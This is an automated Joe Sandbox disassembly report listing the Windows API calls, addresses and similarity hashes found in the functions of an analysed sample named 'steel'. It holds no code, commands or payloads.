• Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
• Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
• Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                            • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                            • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                            • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                            • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                            • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                            • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                            • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                            • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                            • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021503AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastWrite
                                                                                            • String ID:
                                                                                            • API String ID: 442123175-0
                                                                                            • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                            • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                            • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                            • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                            APIs
                                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessage
                                                                                            • String ID:
                                                                                            • API String ID: 1306739567-0
                                                                                            • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                            • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                            • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                            • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                            APIs
                                                                                            • SetEndOfFile.KERNEL32(?,02168000,0040AA59,00000000), ref: 004076B3
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021503AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 734332943-0
                                                                                            • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                            • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                            • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                            • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                            • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                            • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                            • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                            • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                            • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                            • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                            APIs
                                                                                            • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrev
                                                                                            • String ID:
                                                                                            • API String ID: 122130370-0
                                                                                            • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                            • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                            • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                            • Instruction Fuzzy Hash:
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                            • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                            • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                            • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                            APIs
                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1263568516-0
                                                                                            • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                            • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                            • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                            • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                            • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                            • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                            • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
APIs
• VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 00409457
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
• ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 107509674-3733053543
APIs
• FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
• SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
• LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
• LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
APIs
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
APIs
• GetSystemTime.KERNEL32(?), ref: 004026CE
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: SystemTime
• String ID:
• API String ID: 2656138-0
APIs
• GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
• API String ID: 4190037839-2401316094
APIs
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
• GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
• ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
• SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
• GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
• GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
• CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
• GetLastError.KERNEL32(000000F5), ref: 00403C1E
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
• String ID:
• API String ID: 1694776339-0
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
  • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
  • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: InfoLocale$DefaultSystem
• String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
• API String ID: 1044490935-665933166
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                            • LocalFree.KERNEL32(006CAB20,00000000,00401AB4), ref: 00401A1B
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,006CAB20,00000000,00401AB4), ref: 00401A3A
                                                                                            • LocalFree.KERNEL32(006CBB20,?,00000000,00008000,006CAB20,00000000,00401AB4), ref: 00401A79
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                            • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 3782394904-0
                                                                                            • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                            • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                            • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                            • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                            • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitMessageProcess
                                                                                            • String ID: Error$Runtime error at 00000000$9@
                                                                                            • API String ID: 1220098344-1503883590
                                                                                            • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                            • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                            • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                            • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                            Memory Dump Source
